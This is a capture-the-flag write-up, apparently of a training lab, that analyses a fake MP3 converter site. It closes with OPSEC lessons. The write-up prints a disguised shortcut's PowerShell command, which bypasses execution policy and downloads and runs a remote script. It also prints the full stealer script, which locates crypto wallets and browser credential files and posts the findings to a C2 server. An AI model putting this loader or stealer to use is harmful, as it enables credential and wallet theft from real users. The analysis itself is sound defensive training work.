Investigating the Website
all i see is a youtube mp4 to mp3 converter and i try to download a video as an mp3 to see what gonna happen. got and zip file with two mp3 files (thats kinda SUS). so i decided to view the file type of both files
┌──(neo㉿Neoxd)-[~/Downloads]
└─$ file song.mp3
song.mp3: Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 192 kbps, 44.1 kHz, Stereo┌──(neo㉿Neoxd)-[~/Downloads]
└─$ file somg.mp3
somg.mp3: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Unicoded, MachineID win-base-2019, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Sat Sep 15 12:14:14 2018, atime=Sat Sep 15 12:14:14 2018, mtime=Sat Sep 15 12:14:14 2018, length=448000, window=normal, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"RIGHT, Second file is SUS. its a MS Windows shortcut file, AKA .lnk file
Use linkinfo Tool
┌──(neo㉿Neoxd)-[~/Downloads]
└─$ lnkinfo somg.mp3
lnkinfo 20230716
Windows Shortcut information:
Contains a link target identifier
Contains a relative path string
Contains a working directory string
Contains a command line arguments string
Number of data blocks : 4
Link information:
Creation time : Sep 15, 2018 07:14:14.454767300 UTC
Modification time : Sep 15, 2018 07:14:14.454767300 UTC
Access time : Sep 15, 2018 07:14:14.454767300 UTC
File size : 448000 bytes
Icon index : 0
Show Window value : 0x00000001
Hot Key value : 0
File attribute flags : 0x00000020
Should be archived (FILE_ATTRIBUTE_ARCHIVE)
Drive type : Fixed (3)
Drive serial number : 0xa8a4c362
Volume label :
Local path : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Relative path : ..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Working directory : C:\\Windows\\System32\\WindowsPowerShell\\v1.0
Command line arguments : -ep Bypass -nop -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1','C:\\ProgramData\\s.ps1'); iex (Get-Content 'C:\\ProgramData\\s.ps1' -Raw)"
Link target identifier:
Shell item list
Number of items : 7
Shell item: 1
Item type : Root folder
Class type indicator : 0x1f (Root folder)
Shell folder identifier : 20d04fe0-3aea-1069-a2d8-08002b30309d
Shell folder name : My Computer
Shell item: 2
Item type : Volume
Class type indicator : 0x2f (Volume)
Volume name : C:\
Shell item: 3
Item type : File entry
Class type indicator : 0x31 (File entry: Directory)
Name : Windows
Modification time : May 17, 2023 19:45:40
File attribute flags : 0x00000010
Is directory (FILE_ATTRIBUTE_DIRECTORY)
Extension block: 1
Signature : 0xbeef0004 (File entry extension)
Long name : Windows
Creation time : Sep 15, 2018 06:09:28
Access time : May 17, 2023 19:45:40
NTFS file reference : MFT entry: 986, sequence: 1
Shell item: 4
Item type : File entry
Class type indicator : 0x31 (File entry: Directory)
Name : System32
Modification time : Oct 30, 2024 14:10:32
File attribute flags : 0x00000010
Is directory (FILE_ATTRIBUTE_DIRECTORY)
Extension block: 1
Signature : 0xbeef0004 (File entry extension)
Long name : System32
Creation time : Sep 15, 2018 06:09:28
Access time : Oct 30, 2024 14:10:32
NTFS file reference : MFT entry: 30079, sequence: 1
Shell item: 5
Item type : File entry
Class type indicator : 0x31 (File entry: Directory)
Name : WindowsPowerShell
Modification time : Sep 15, 2018 07:19:02
File attribute flags : 0x00000010
Is directory (FILE_ATTRIBUTE_DIRECTORY)
Extension block: 1
Signature : 0xbeef0004 (File entry extension)
Long name : WindowsPowerShell
Creation time : Sep 15, 2018 07:19:02
Access time : Sep 15, 2018 07:19:02
NTFS file reference : MFT entry: 31432, sequence: 1
Shell item: 6
Item type : File entry
Class type indicator : 0x31 (File entry: Directory)
Name : v1.0
Modification time : Sep 15, 2018 09:07:34
File attribute flags : 0x00000010
Is directory (FILE_ATTRIBUTE_DIRECTORY)
Extension block: 1
Signature : 0xbeef0004 (File entry extension)
Long name : v1.0
Creation time : Sep 15, 2018 07:19:02
Access time : Sep 15, 2018 09:07:34
NTFS file reference : MFT entry: 31433, sequence: 1
Shell item: 7
Item type : File entry
Class type indicator : 0x32 (File entry: File)
Name : powershell.exe
Modification time : Sep 15, 2018 07:14:16
File attribute flags : 0x00000020
Should be archived (FILE_ATTRIBUTE_ARCHIVE)
Extension block: 1
Signature : 0xbeef0004 (File entry extension)
Long name : powershell.exe
Creation time : Sep 15, 2018 07:14:16
Access time : Sep 15, 2018 07:14:16
NTFS file reference : MFT entry: 203979, sequence: 1
Data block: 1
Signature : 0xa0000005 (Special folder location)
Data block: 2
Signature : 0xa000000b (Known folder location)
Data block: 3
Signature : 0xa0000003 (Distributed link tracker properties)
Machine identifier : win-base-2019
Droid volume identifier : f6953da0-d6bb-4c14-8dd4-1d39a7683054
Droid file identifier : 1be092cd-96c8-11ef-82da-02a0a1a4abe5
Birth droid volume identifier : f6953da0-d6bb-4c14-8dd4-1d39a7683054
Birth droid file identifier : 1be092cd-96c8-11ef-82da-02a0a1a4abe5
Data block: 4
Signature : 0xa0000009 (Metadata property store)
{dabd30ed-0043-4789-a7f8-d013a4736622}/100 (PKEY_ItemFolderPathDisplayNarrow)
Value (0x001f) : v1.0 (C:\Windows\System32\WindowsPowerShell)
{46588ae2-4cbc-4338-bbfc-139326986dce}/4 (Unknown)
Value (0x001f) : S-1-5-21-1966530601-3185510712-10604624-500
{b725f130-47ef-101a-a5f1-02608c9eebac}/10 (PKEY_ItemNameDisplay)
Value (0x001f) : powershell.exe
{b725f130-47ef-101a-a5f1-02608c9eebac}/15 (PKEY_DateCreated)
Value (0x0040) : Sep 15, 2018 07:14:16.000000000 UTC
{b725f130-47ef-101a-a5f1-02608c9eebac}/12 (Unknown)
Value (0x0015) : 448000
{b725f130-47ef-101a-a5f1-02608c9eebac}/4 (PKEY_ItemTypeText)
Value (0x001f) : Application
{b725f130-47ef-101a-a5f1-02608c9eebac}/14 (PKEY_DateModified)
Value (0x0040) : Sep 15, 2018 07:14:14.454767300 UTC
{28636aa6-953d-11d2-b5d6-00c04fd918d0}/30 (PKEY_ParsingPath)
Value (0x001f) : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
{446d16b1-8dad-4870-a748-402ea43d788c}/104 (System.VolumeId)
Value (0x0048) : 19127295-0000-0000-0000-100000000000
As per the details that .lnk file executes a malicious PowerShell command. Here’s the lnkinfo output breakdown :
-
-ep Bypass:
- Bypasses the PowerShell script execution policy to allow the script to run, regardless of the system’s restrictions.
-
-nop:
- No profile. Prevents the loading of PowerShell profiles, which could detect or interfere with the script.
-
-c:
- Executes the provided command.
-
(New-Object Net.WebClient).DownloadFile(…):
- Downloads a script from https://raw.githubusercontent.com/MM-WarevilleTHM/IS/refs/heads/main/IS.ps1.
- Saves it as C:\ProgramData\s.ps1.
-
iex (Get-Content ‘C:\ProgramData\s.ps1’ -Raw):
- Executes (iex or Invoke-Expression) the downloaded script.
Deep dive into the Malicious Script
function Print-AsciiArt {
Write-Host " ____ _ ___ _____ ___ _ _ "
Write-Host " / ___| | | |_ _||_ _| / __| | | | |"
Write-Host "| | _ | | | | | | | | | |_| |"
Write-Host "| |_| | | |___ | | | | | |__ | _ |"
Write-Host " \____| |_____| |___| |_| \___| |_| |_|"
Write-Host " Created by the one and only M.M."
}
# Call the function to print the ASCII art
Print-AsciiArt
# Path for the info file
$infoFilePath = "stolen_info.txt"
# Function to search for wallet files
function Search-ForWallets {
$walletPaths = @(
"$env:USERPROFILE\.bitcoin\wallet.dat",
"$env:USERPROFILE\.ethereum\keystore\*",
"$env:USERPROFILE\.monero\wallet",
"$env:USERPROFILE\.dogecoin\wallet.dat"
)
Add-Content -Path $infoFilePath -Value "`n### Crypto Wallet Files ###"
foreach ($path in $walletPaths) {
if (Test-Path $path) {
Add-Content -Path $infoFilePath -Value "Found wallet: $path"
}
}
}
# Function to search for browser credential files (SQLite databases)
function Search-ForBrowserCredentials {
$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
$firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\logins.json"
Add-Content -Path $infoFilePath -Value "`n### Browser Credential Files ###"
if (Test-Path $chromePath) {
Add-Content -Path $infoFilePath -Value "Found Chrome credentials: $chromePath"
}
if (Test-Path $firefoxPath) {
Add-Content -Path $infoFilePath -Value "Found Firefox credentials: $firefoxPath"
}
}
# Function to send the stolen info to a C2 server
function Send-InfoToC2Server {
$c2Url = "http://papash3ll.thm/data"
$data = Get-Content -Path $infoFilePath -Raw
# Using Invoke-WebRequest to send data to the C2 server
Invoke-WebRequest -Uri $c2Url -Method Post -Body $data
}
# Main execution flow
Search-ForWallets
Search-ForBrowserCredentials
Send-InfoToC2Server-
ASCII Art Branding:
- Prints a custom ASCII banner indicating it’s created by “M.M.”
-
stolen_info.txt**:**
- Creates a file (stolen_info.txt) to store gathered data.
-
Search for Sensitive Data:
- Crypto Wallets:
- Searches for wallet files in common directories for Bitcoin, Ethereum, Monero, and Dogecoin.
- If found, records their paths in stolen_info.txt.
- Browser Credentials:
- Checks for Chrome’s Login Data (stored in an SQLite database).
- Looks for Firefox’s logins.json (contains saved credentials).
- Records their paths if found.
- Crypto Wallets:
-
Exfiltration to Command and Control (C2) Server:
- C2 URL: http://papash3ll.thm/data.
- Reads the contents of stolen_info.txt and sends it to the server via Invoke-WebRequest.
Searching the Soruce
“There are many paths we could take to continue our investigation. We could investigate the website further, analyse its source code, or search for open directories that might reveal more information about the malicious actor’s setup. We can search for the hash or signature on public malware databases like VirusTotal or Any.Run. Each of these methods could yield useful clues.”
Introduction to OPSEC
Operational Security (OPSEC) is crucial for protecting sensitive information and operations from adversaries. Failure to practice good OPSEC, even by malicious actors, often leads to their exposure.
In the context of cyber security, when malicious actors fail to follow proper OPSEC practices, they might leave digital traces that can be pieced together to reveal their identity. Some common OPSEC mistakes include:
Common mistakes include:
- Account Reuse: Reusing usernames, emails, or handles across platforms links online personas.
- Metadata Leaks: Leaving identifying metadata (device names, GPS data, timestamps) in code, documents, or images.
- Publicly Identifiable Information: Posting details linking online activity to real-world identity, location, or habits on public forums or platforms like GitHub.
- Lack of Network Anonymity: Failing to use VPNs or proxies to mask IP addresses.
Real-world examples of OPSEC failures
-
AlphaBay Admin (Alexandre Cazes): Used a revealing email address (“pimp_alex_91@hotmail.com”), reused the username “Alpha02” across platforms, and linked his Bitcoin account to his real name.
-
Chinese Military Hacking Group (APT1): A member signed malware with the nickname “Ugly Gorilla,” linked to his real name on programming forums. The group used predictable naming conventions and operated consistently during Beijing business hours.
These examples demonstrate that even sophisticated actors make human errors that compromise their anonymity and lead to identification by law enforcement and security researchers. The core principle of OPSEC is proactive identification and mitigation of vulnerabilities before they can be exploited by adversaries.